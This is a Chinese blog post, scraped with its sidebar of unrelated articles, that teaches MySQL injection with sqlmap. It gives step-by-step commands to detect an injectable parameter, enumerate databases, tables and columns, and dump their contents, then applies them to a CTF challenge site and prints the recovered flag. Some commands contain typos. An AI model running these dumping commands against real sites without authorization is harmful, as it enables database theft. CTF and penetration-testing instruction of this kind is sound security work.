SQLmap————3、MySQL注入

最新推荐文章于 2023-05-22 18:52:04 发布
最新推荐文章于 2023-05-22 18:52:04 发布
阅读量579 收藏 5
点赞数 1
分类专栏: 【渗透工具】 # SQLmap
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Fly_hps/article/details/80198475
版权

MySQL注入流程

1、判断是否可以注入

Sqlmap  –u  http://www.xxx.com/login.php?id=1

2、猜解数据库名称

Sqlmap  –u  http://www.xxx.com/login.php?id=1   --Database

3、猜解表名

Sqlmap  –u  http://www.xxx.com/login.php?id=1 –D  datebasename  --Tables

4、猜解字段名

Sqlmap  –u  http://www.xxx.com/login.php?id=1 –D  datebasename   –T  tablename    --columns

5、爆字段名

Sqlmap  –u  http://www.xxx.com/login.php?id=1 –D datebasename–T tablename –C columnname –dump

实战演示:

一道CTF测试题目:

目标地址: http://ctf5.shiyanbar.com/web/index_3.php?id=1

1)在终端输入命令:“Sqlmap.py –u 目标URL  -u扫描注入点扫描目标主机,检测出的信息准确。

(2)爆出数据库:

Sqlmap.py –u  http://ctf5.shiyanbar.com/web/index_3.php?id=1–-dbs


(3)爆表:

Sqlmap.py –u  http://ctf5.shiyanbar.com/web/index_3.php?id=1–D web1 –-tables


(4)爆字段:

Sqlmap.py –u  http://ctf5.shiyanbar.com/web/index_3.php?id=1–D web1 –T flag –-columns 




(5)显示字段值:

Sqlmap.py –u  http://ctf5.shiyanbar.com/web/index_3.php?id=1 –D web1 –T flag –C--dump


至此获得flag:

flag{Y0u_@r3_5O_dAmn_90Od}

FLy_鹏程万里
关注
  • 1
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
详解强大的SQL注入工具——SQLMAP
05-09
这是一个审计数据库安全的SQL注入工具的使用指南, 该工具在windows平台与linux平台下均可以使用。数据库管理员(DBA)可用它来检 验自己的数据库是否存在安全配置方面的漏洞。
sqlmapproject-sqlmap-1.5.3-24-gbce3abc.zip
03-28
在这个“sqlmapproject-sqlmap-1.5.3-24-gbce3abc.zip”压缩包中,我们得到了SQLMap的最新版本——SQLMap 1.5.3,无需安装即可使用,为渗透测试和安全研究人员提供了极大的便利。 一、SQLMap介绍 SQLMap的主要功能...
antdesignpro 重定向到登录页面_我的Java Web之路64 - 会话过期链接失效问题及转发和重定向解析
weixin_39565021的博客
11-20 453
本系列文章旨在记录和总结自己在Java Web开发之路上的知识点、经验、问题和思考,希望能帮助更多(Java)码农和想成为(Java)码农的人。提示:尽量使用头条APP阅读,头条网页展示代码会有问题。目录介绍问题描述问题分析会话过期后session对象的处理转发重定向问题解决总结介绍今天本来打算在上篇文章的基础上继续开发我们的租房网应用,结果在我先重新演示该应用的时候发现了一个如标题所示的问题。那...
2021-10-15 antdpro 登录页需要登陆两次才能跳转的问题
u011341849的博客
10-15 1443
AntdPro 登陆页面,第一次点击登陆页面没有跳转,再点击一次登陆按钮才能跳转 这个问题我查了好久,网上也搜了很多资料。好像都没有针对这个问题的回答。期初我怀疑是history.push的问题,查了好多antdpro不跳转,history.push不跳转的相关词条。后来一步步断点发现。 其实页面跳转了,但是因为没有识别登陆状态,没有在initialState中取到currentUser,于是页面又重定向到了登陆页面。仔细想想,官方示例登陆是直接判断的,并没有请求哇,,,,呜呜呜,我傻了。请求改为异步后,
antdesignpro 重定向到登录页面_干货 | vue-router与创建登录组件
weixin_39774490的博客
11-19 966
最近在学习使用Vue作为前端的框架,本文记录路由插件vue-router,以及搭建登录页面的过程。vue-router在使用vue-router时,我们需要做的就是把路由映射到各个组件,vue-router会把各个组件渲染到正确的地方。1安装、起步· 安装npm install vue-router --save· 起步2基本用法· HTML<div id="app"> <h...
antd v5 pro 项目登录页面刷新后登录成功跳转失败
最新发布
gaoxiaofei520sss的博客
05-22 683
问题出在这,该方法,之前登录返回为undefined。之前版本没有这个问题,升级后出现。只有第一次、或者关闭浏览器重新打开时点击登录,才可以进入。点击浏览器刷新,登录成功,跳转为当前页面。这个问题很好解决,直接答应对应的数据,发现login.tsx,存储数据的格式和之前不一致,显示有误,做相应修改即可。第一步,显示登录成功,但跳转失败,说明await fetchUserInfo()有问题。第三步,排查app.tsx getInitialState方法。发现为undefined。第二步,打印初始化数据。
antdesignpro 重定向到登录页面_Bluehost 域名解析和 301 重定向设置
weixin_39888268的博客
10-17 596
什么是重定向?(redirect)举个例子,https://www.liaosam.com 和 https://go.liaosam.com 是两个独立的网站,一个是料网,一个是料网导航。权重、各项 SEO 指标都是独立的。最重要的是,网站内容都是独立的,熟悉建站的人都知道,二级域名相当于独立的站。如果某天我不想让别人访问料网上的内容,那么我可以让浏览者在试图访问料网时自动被跳转到导航站去,这个过...
SQLMAP系列课程
04-27
6. 非标准数据库支持:SQLMAP支持多种数据库管理系统,课程可能涉及MySQL、PostgreSQL、Oracle等非标准SQL的注入技巧。 7. 防御与规避策略:学习如何识别和绕过WAF(Web应用防火墙)、CAPTCHA验证码以及其他防御...
sqlmapproject-sqlmap-1.6.7-2-g8c26c67.zip
07-28
《SQL注入工具Sqlmap详解——基于sqlmapproject-sqlmap-1.6.7-2-g8c26c67.zip》 在网络安全领域,SQL注入是一种常见的攻击手段,利用这种技术,攻击者可以通过输入恶意的SQL代码来操纵数据库,获取敏感信息甚至控制...
MySQL数据库渗透及漏洞利用总结
02-25
各种Mysql注入Mysql提权,Mysql数据库root账号webshell获取等的,但没有一个对Mysql数据库渗透较为全面对总结,针对这种情况我们开展了研究,虽然我们团队今年正在出版《网络攻防实战研究——漏洞利用与提权》,但...
antd 实现跳转
金溪的博客
08-14 4834
使用<Link />标签 1. 导入umi组件 import Link from 'umi/link'; 2. 页面使用<Link />标签 <Link to="/dashboard/analysis?id=1&name=admin"><Button icon="plus"><FormattedMessage id='glo...
ant design pro 跳转新页面 修改功能
斑斓 小星愿的博客
11-04 6220
ant design pro 修改功能跳转新页面背景例子页面跳转 背景 在官方提供的例子中 是以弹窗的形式做的修改和新增,在项目中如果遇到 采集项数较多,会在修改页面添加别的功能的情况下 弹窗满足不了此需求了。 例子 页面跳转 先说修改页面吧, 需要在路由配置此页面路由,修改页面会带着此条数据中的唯一标识id。 // 这是列表页的路由配置 { path: '/pages/data-tab...
ant design pro项目安装以及坑点和大部分可能出现问题总结
热门推荐
m0_51291285的博客
07-14 4万+
ant design pro
Ant design pro使用(五):未登录时自动跳转到登录页,登录之后不再返回登录页
好气嗷,但仍要保持微笑!
11-09 6088
判断是否登录,要在routes中配置 SecurityLayout config/config.ts routes:[ { path:'/user', layout: false, routes:[ {path:'/user',redirect:'/user/login'}, { path:'/user/login', name:'登录', component:'./User/Lo
Ant Design Pro 项目路由跳转及路由传参跳转
weixin_46424838的博客
03-11 3191
背景:项目需要领航页,领航页需要实现点击列表内容跳转到相应的二级页面,并且带参跳转. 跳转方法:Link 官网:https://beta-pro.ant.design/config/api-cn#link 接收数据方法:useLocation 官网:https://beta-pro.ant.design/config/api-cn#uselocation 实际项目示例: <Link to={{ pathna
Ant Design V5 menu导航栏点击跳转
qq_39377906的博客
02-01 784
使用antd的menu组件生成导航栏,使用Hook管理导航栏的当前选中,根据当前选中,使用react-router-dom的useNavigate进行跳转
ant-design 使用中出现的bug或者问题总结
weixin_43152108的博客
09-04 898
1,使用tree树形结构时 如果设置自动展开全部 但是数据是异步获取到的则不会展开.因为标签创立的时候已经走过了 所以不会展开 这时候需要现有数据 再有dom结构 则需要加 这里的作用是用有没有数据或者其他条件来判断if 创建不创建.相当于初始化. 2, ...
刷屏技术圈的Ant Design 事件,到底是“彩蛋”还是“地雷”?
实验楼
12-25 2239
Ant Design彩蛋事件成为了今日的知乎热榜,截至我发文时,热度已经高达1509万。根据网上的描述,事情大致是这样的:国内著名开源前端组件库Ant Design,在未...
Ant Design 遭删库!
唐小引的 CSDN 博客
02-15 2万+
在程序员们还都放假过年之时,在 GitHub 上拥有数万 Star 的蚂蚁金服企业级 UI 设计语言和 React 组件库 Ant Design 横遭删库。
sqlmap中文手册-sql注入自动化测试工具
07-19
sql注入自动化测试工具sqlmap的操作手册,中文版,值得拥有哦。Web安全测试必备工具。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

FLy_鹏程万里

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值